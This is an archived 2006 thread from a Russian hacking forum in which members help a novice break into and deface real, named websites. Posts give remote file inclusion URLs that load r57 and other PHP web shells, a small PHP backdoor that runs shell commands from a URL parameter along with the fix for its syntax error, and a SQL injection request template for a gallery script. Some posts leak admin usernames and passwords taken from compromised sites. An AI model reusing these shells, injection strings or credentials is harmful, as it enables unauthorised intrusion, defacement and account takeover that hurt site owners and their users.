Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Вопрос по shell (https://forum.antichat.xyz/showthread.php?t=23463)

IIAHbI4 03.09.2006 13:56
Вопрос по shell
 
Никак не получаеться шелл залить,вернее получаеться но както криво,вроде заливка идёт,но ничего не происходит
вот ссылка http://df.md/index.php?act=http://arry1.narod.ru/shell
или http://df.md/index.php?act=http://fordestroy.narod.ru/r57shel,
а если можно и тутор дайте,хочу Дефес зделать вот ..всё вродеб...
спс заранее.

IIAHbI4 03.09.2006 13:58
Ps юзал поиск не нарыл ничего,щас в видео бибиотеке гляну.

SMiX 03.09.2006 14:08
Не грузится у меня чет ни df.md, ни твои сайты на народе...

IIAHbI4 03.09.2006 14:12
странно.... http://www.df.md

gemaglabin 03.09.2006 14:12
Если с шеллом не получится попробуй SQL-запрос выполнить в галерее

PHP код:
GET /cpg/displayimage.php?album=random&cat=0&pos=-{Not Viewd Image IDHTTP/1.1
Hostадрес сайта
User-Agent’sql commands
Keep-Alive300
Cookieтвоя сессия 

IIAHbI4 03.09.2006 14:14
мммм.....http://arry1.narod.ru/shell.php разве не грузиться?

IIAHbI4 03.09.2006 14:18
Цитата:
Сообщение от gemaglabin
Если с шеллом не получится попробуй SQL-запрос выполнить в галерее

PHP код:
GET /cpg/displayimage.php?album=random&cat=0&pos=-{Not Viewd Image IDHTTP/1.1
Hostадрес сайта
User-Agent’sql commands
Keep-Alive300
Cookieтвоя сессия 
неа не вышло...но спс за поддержку +1 тебе)

IIAHbI4 03.09.2006 14:20
слуш как проверить валидность шела?этого http://arry1.narod.ru/shell
просо думал пчп иньекцию,а потом радмином...

IIAHbI4 03.09.2006 16:44
вот ещё нарыл, http://www.grailcoat.com/index.php?p=12 следвательно => http://www.grailcoat.com/index.php?p=http://arry1.narod.ru/1.txt&c=ls%20-l
где 1.тхт :
Цитата:
<?
if (!empty($_GET['c'])) {
echo '<pre>';
system($_GET['c']};
echo '</pre>';
}
exit;
?>
а пишет "parse error" в чём ошибка?

IIAHbI4 03.09.2006 16:54
потом ввел http://www.grailcoat.com/index.php?p=http://arry1.narod.ru/shell.php&c=ls%20-l
и ваще какаята бредуха Оо
поможет ктото?

nc.STRIEM 03.09.2006 17:00
Цитата:
Сообщение от IIAHbI4
вот ещё нарыл, http://www.grailcoat.com/index.php?p=12 следвательно => http://www.grailcoat.com/index.php?p=http://arry1.narod.ru/1.txt&c=ls%20-l


а пишет "parse error" в чём ошибка?
Да нифига не следовательно!
смотри: http://www.grailcoat.com/index.php?p=%3Cscript%3Ealert()%3C/script%3E
выскакивает алерт, это пасивная xss а ты туда просто ссылку вставляеш! так ничего не получиться!

IIAHbI4 03.09.2006 17:01
УРААААААААААААААААААААААА АААА! взломан )))))
ошибку нашел)))))

IIAHbI4 03.09.2006 17:02
нет там по другому надо было зделать )))

IIAHbI4 03.09.2006 17:16
вот скриники http://slil.ru/23085371 )

IIAHbI4 03.09.2006 19:27
чёт http://www.g4.com.tw/index.php?p=http://rst.void.ru/download/r57shell.txt сюда не заливаеться ремвьюв с http://arry1.narod.ru/remview.php Оо
ребята реально помогите ктото,я первый раз пытаюсь чтото взломать (цель дефейс)
и нужна помошь,вспомните себя в начале... плз)
***чтобы не зделал пишет "Доступ запрещён!"

zerg 03.09.2006 22:53
system($_GET['c']};
нетакая скобка system($_GET['c']);

r0 04.09.2006 14:05
всё нормально инклудить, вот пример с удаленным файлом :
_http://www.grailcoat.com/index.php?p=http://rst.void.ru/download/r57shell.txt =)

IIAHbI4 04.09.2006 15:35
по поводу http://www.grailcoat.com/,там редактировать недьзя...,написал в строке выполнить /admin.php там взял пасс (кстати вот он пас от админики сайта юзер grail
пасс grailPASS123 но админка невалидная ))))
ЗЫ: спасибо большое gemaglab1n,единственный чел который помог и обьяснил что к чему)

Sw%00p 05.09.2006 02:51
чё вы бедный http://www.grailcoat.com/ мучаете
вот поиграйтесь с комуняками
http://www.belkprf.ru/news.php?article=http://hrs-xss.narod.ru/shell.php

IIAHbI4 05.09.2006 17:48
Цитата:
Сообщение от Sw%00p
чё вы бедный http://www.grailcoat.com/ мучаете
вот поиграйтесь с комуняками
http://www.belkprf.ru/news.php?article=http://hrs-xss.narod.ru/shell.php
)))) :D

Digimortal 08.09.2006 13:44
Цитата:
Сообщение от Sw%00p
чё вы бедный http://www.grailcoat.com/ мучаете
вот поиграйтесь с комуняками
http://www.belkprf.ru/news.php?article=http://hrs-xss.narod.ru/shell.php
Не понял прикола.. Залазю на на етот коммунистический сайт - там сейф моде и все такое. Просматриваю несколько папочек и нахожу в home/darlock/public_html/belhouse/sadmin/admin.inc 2 одинаковых хеша, явно логин:пасс к админке сайта (это уже сайт не коммуняк, а про недвижимость). Хеши быстро колются и говорят, что они bel01:bel01.
Ну захожу я в админку, а там вместо админки-то одна надпись: "все ссылки на место!"... :) :) :)

Sw%00p 09.09.2006 00:11
Цитата:
Сообщение от Digimortal
Не понял прикола.. Залазю на на етот коммунистический сайт - там сейф моде и все такое. Просматриваю несколько папочек и нахожу в home/darlock/public_html/belhouse/sadmin/admin.inc 2 одинаковых хеша, явно логин:пасс к админке сайта (это уже сайт не коммуняк, а про недвижимость). Хеши быстро колются и говорят, что они bel01:bel01.
Ну захожу я в админку, а там вместо админки-то одна надпись: "все ссылки на место!"... :) :) :)
даааааааааааааа :( видать сейф мод обходить невозможно
ну это же не мой сайт чё ты надём хош найти??????
базу кред (блин чё за брехня)
или я сбрендил уже кардингом что те просто ссылу дам с кредами?
Радуйся жизни и всё будет уЁЁЁЁЁЁ
вот тока незабывай заповеди!!!!!!!
помни их

scorpic393 10.03.2010 16:46
Классно было в 2006, каждый второй сайт ломаеться =)

не то что щас...


Время: 21:24